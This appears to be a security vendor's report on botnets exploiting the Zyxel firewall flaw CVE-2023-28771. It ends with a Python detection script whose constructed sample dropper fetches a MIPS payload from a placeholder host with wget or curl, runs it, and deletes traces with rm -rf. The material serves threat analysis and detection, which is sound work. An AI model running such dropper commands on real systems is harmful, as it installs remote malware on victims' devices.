Impact: Remote attackers gain control of the vulnerable systems

In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability (CVE-2023-28771). This vulnerability is a command injection flaw affecting multiple firewall models that could allow an unauthorized attacker to execute arbitrary code by sending a specifically crafted packet to the targeted device. The severity of this flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. Zyxel released a security advisory regarding this vulnerability on April 25, 2023. Subsequently, the Cybersecurity and Infrastructure Security Agency (CISA) added this security flaw to its Known Exploited Vulnerabilities (KEV) catalog in May.

Through the capture of exploit traffic, the attackers' IP addresses were identified, and the attacks were found to be occurring in multiple regions, including Central America, North America, East Asia, and South Asia. Since the publication of the exploit module, there has been a sustained surge in malicious activity. Analysis conducted by FortiGuard Labs has identified a significant increase in attack bursts starting from May, as depicted in the trigger count graph shown in Figure 1. We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods. In this article, we provide a detailed explanation of the payload delivered through CVE-2023-28771 and the associated botnets.

The script files obtained in these attacks exclusively download files tailored for the MIPS architecture, indicating a highly specific target. In Figure 3, the script downloads a file named "lolmips" from the IP address 921183916 and saves it as ".zw". Subsequently, it executes with the "zywall" parameter, indicating its connection to the Zyxel firewall vulnerability. The script file shown in Figure 4 was downloaded from 1712213615, which has been associated with the Rapperbot malware. However, we observed this script being forwarded to 1712213618, where it dropped additional MIPS files for subsequent actions. The script files in Figure 5 exhibit similar code patterns despite originating from different server IP addresses. These scripts employ the "rm -rf" command to remove the ".zw" file from the temporary folder and save the current file as "/tmp/a". Notably, the execution files display resemblances. It appears that this campaign utilized multiple servers to launch attacks and updated itself within a few days to maximize the compromise of Zyxel devices. In the following sections, we introduce the botnets we have identified as spreading via CVE-2023-28771 over the past month.

Targeting vulnerable devices has always been a primary objective for threat actors, and the prevalence of remote code execution attacks poses a major concern for IoT devices and Linux servers. The presence of exposed vulnerabilities in devices can lead to significant risks. Once an attacker gains control over a vulnerable device, they can incorporate it into their botnet, enabling them to execute additional attacks, such as DDoS. To effectively address this threat, it is crucial to prioritize the application of patches and updates whenever possible. Taking proactive measures to ensure the security of these devices is highly recommended.
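The downloader traits shared by the captured scripts (a fetch of a MIPS payload, a hidden ".zw" drop name in the temporary folder, execution with the "zywall" argument, and cleanup with "rm -rf") can be turned into a triage check for scripts recovered from honeypots or device logs. The Python below is an added example, not code from the FortiGuard report; the sample script and the 198.51.100.7 address are constructed placeholders, not indicators from the campaign.

```python
import re

# Constructed sample modelled on the behaviour described in the report.
# The address is a documentation-range placeholder, not a real indicator.
SAMPLE_SCRIPT = """cd /tmp; rm -rf .zw
wget http://198.51.100.7/lolmips -O .zw || curl -s http://198.51.100.7/lolmips -o .zw
chmod 777 .zw
./.zw zywall
cp .zw /tmp/a; rm -rf /tmp/.zw
"""

# Split a shell line into simple commands on ';', '&&', '||' and '|'.
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def analyze_dropper(text: str) -> dict:
    """Extract the behaviours a defender cares about from a dropper script:
    download URLs, hidden file names, './prog arg' executions and rm -rf targets."""
    found = {"urls": [], "hidden_files": set(), "exec_args": [], "removed": []}
    for line in text.splitlines():
        for cmd in SEPARATORS.split(line.strip()):
            argv = cmd.split()
            if not argv:
                continue
            name = argv[0]
            if name in ("wget", "curl", "tftp"):
                found["urls"] += [a for a in argv[1:] if a.startswith("http")]
            if name == "rm" and "-rf" in argv:
                found["removed"] += argv[argv.index("-rf") + 1:]
            if name.startswith("./") and len(argv) > 1:
                found["exec_args"].append((name[2:], argv[1]))
            for tok in argv:  # hidden (dot-prefixed) file names such as .zw
                base = tok.rsplit("/", 1)[-1]
                if base.startswith(".") and base not in (".", "..") and not tok.startswith("http"):
                    found["hidden_files"].add(base)
    return found


def matches_campaign(found: dict) -> bool:
    """True when all four traits the report attributes to these scripts are present."""
    return (bool(found["urls"])
            and bool(found["hidden_files"])
            and any(arg == "zywall" for _, arg in found["exec_args"])
            and bool(found["removed"]))


if __name__ == "__main__":
    result = analyze_dropper(SAMPLE_SCRIPT)
    print(result, "campaign-like:", matches_campaign(result))
```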